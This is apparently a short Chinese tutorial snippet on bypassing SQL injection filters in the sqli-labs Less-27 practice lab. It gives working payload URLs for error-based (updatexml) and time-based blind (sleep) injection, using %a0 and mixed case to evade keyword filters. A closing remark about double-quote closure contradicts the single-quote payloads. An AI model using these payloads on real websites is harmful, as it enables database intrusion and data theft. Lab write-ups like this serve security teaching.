赞
踩
目录
使用 and 或者 or 添加一个表达式 or '1' = '1 注意后面一定要缺省一个单引号。否则 SQL 语句不能正常闭合。
不过我们可以看到代码中的过滤并不完善,我们可以利用前面学过的多种方式进行绕过。
http://192.168.1.103/sqli-labs/Less-27/?id=1'
and%a0updatexml(1,concat(0x7e,(sElEct%a0database()),0x7e),1) and '1'='1
例 2:盲注绕过
http://192.168.1.103/sqli-labs/Less-27/?id=1'
and%a0if((length(database())=8),sleep(3),null)and '1'='1
通过以上实验可看到闭合方式是双引号 "
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。